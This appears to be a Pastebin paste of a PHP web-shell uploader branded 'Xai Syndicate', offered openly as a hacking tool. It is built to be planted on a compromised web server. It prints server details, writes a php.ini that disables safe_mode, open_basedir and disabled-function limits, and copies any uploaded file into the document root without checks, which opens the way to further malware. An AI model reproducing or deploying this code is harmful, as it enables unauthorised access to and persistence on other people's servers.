Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2018
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.01 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Xai Syndicate Uploader !</title>
  4. <meta name="keywords" content="Kaizen Uploader,Xai syndicate uploader,xai syndicate,xai,kaizen">
  5. <meta name="description" content="Xai Syndicate Uploader">
  6. <meta name="rating" content="General">
  7. <meta name="revisit-after" content="1 days">
  8. <meta name="classification" content="Author by Kaizen">
  9. <meta name="robots schedule" content="auto">
  10. <style type='text/css'>
  11. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  12. html {
  13.     background: #000000;
  14.     color: #ffffff;
  15.     font-family: 'Ubuntu';
  16.     font-size: 13px;
  17.     width: 100%;
  18. }
  19. table, th, td {
  20.     border-collapse:collapse;
  21.     font-family: Tahoma, Geneva, sans-serif;
  22.     background: transparent;
  23.     font-family: 'Ubuntu';
  24.     font-size: 13px;
  25. }
  26. input[type=submit] {
  27.     background: transparent;
  28.     color: #ffffff;
  29.     height: 24px;
  30.     border: 1px solid #ffffff;
  31.     margin: 5px auto;
  32.     padding-left: 5px;
  33.     font-family: 'Ubuntu';
  34.     font-size: 13px;
  35. }
  36. select {
  37.     width: 152px;
  38.     background: #000000;
  39.     color: white;
  40.     border: 1px solid #ffffff;
  41.     margin: 5px auto;
  42.     padding-left: 5px;
  43.     font-family: 'Ubuntu';
  44.     font-size: 13px;
  45. }
  46. </style>
  47. </head>
  48. <center><br>
  49. <pre>
  50. ▂▃▅▇█▓▒░۩۞۩ஜ۩ XAI SYNDICATE ۩ஜ۩۞۩░▒▓█▇▅▃▂
  51.  
  52. ☠️   Allah always watching you :)   ☠️  
  53.  
  54. ▬▬▬▬▬▬▬▬▬▬▬▬▬ஜ۩۞۩ஜ▬▬▬▬▬▬▬▬▬▬▬▬▬
  55.  
  56. </pre>
  57. <a href="https://www.facebook.com/Kaizen1337.gov"><img src='https://preview.ibb.co/hRrqTS/uploader.png' title="Official Xai Syndicate" width='700' height='180' align='center'></a>
  58. <br>
  59. <body bgcolor="black">
  60. <?php
  61. /*
  62. []##############################################
  63. []----------------------------------------------------------------                    
  64. [] Xai Syndicate Bypass Uploader
  65. [] Author : Kaizen - Con7ext - Mr.7z
  66. [] Thanks to : AnonGhost Team - Lulzsec India - Xai Syndicate - Green Coders
  67. [] Contact : https://www.facebook.com/Kaizen1337.gov                                                        
  68. [] ---------------------------------------------------------------
  69. []##############################################
  70. */
  71. error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
  72. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=red>NONE</font>";
  73. echo "<b><font color='white'><br>Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."</b></font>";
  74. echo "<b><font color='white'><br>".php_uname()."</b></font><br>";
  75. echo "<b><font color='white'>Disable Functions : $show_ds</b></font><br><br>";
  76. echo "<form method='post'>
  77. <input type='submit' name='funct' value='Bypass Disabled Functions'>
  78. </form>";
  79. if($_POST['funct']) {
  80. $file = 'php.ini';
  81. file_put_contents($file,'safe_mode = OFF
  82. disable_functions = NONE
  83. safe_mode_gid = OFF
  84. open_basedir = OFF');
  85. echo "<font color='#2EFEF7'>Bypased!!</font>";
  86. }
  87.  
  88. echo "<font color='white'><form method='post' enctype='multipart/form-data'>
  89.       <input type='file' name='file'>
  90.       <input type='submit' name='upload' value='Fvck`em'>
  91.       </form>";
  92. $root = $_SERVER['DOCUMENT_ROOT'];
  93. $files = $_FILES['file']['name'];
  94. $dest = $root.'/'.$files;
  95. if(isset($_POST['upload'])) {
  96.     if(is_writable($root)) {
  97.         if(@copy($_FILES['file']['tmp_name'], $dest)) {
  98.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  99.             echo "Upload Success , File Location at=> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  100.         } else {
  101.             echo "Upload Failed";
  102.         }
  103.     } else {
  104.         if(@copy($_FILES['file']['tmp_name'], $files)) {
  105.             echo "Success <b>$files</b> at folder";
  106.         } else {
  107.             echo "Upload Failed";
  108.         }
  109.     }
  110. }
  111.  
  112. ?>
  113. <script>alert('Notes : Gunakan tools ini dengan bijak , recode jangan lupa mengembangkan tools dan harap sertakan copyright ya kimak bukan cuma edite background + hapus copyright ,for reason; jangan lupa sholat 5 waktu , Allah always watching you :) ingat dosa ingat siksa kubur :) Jangan Hek-hekan mulu goblok | KAIZEN STILL GANS ;)')</script>
  114. <font face='Arial' color='white' size='4px'><br>━═★ Powered by Xai Syndicate 2018 ★═━
  115. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement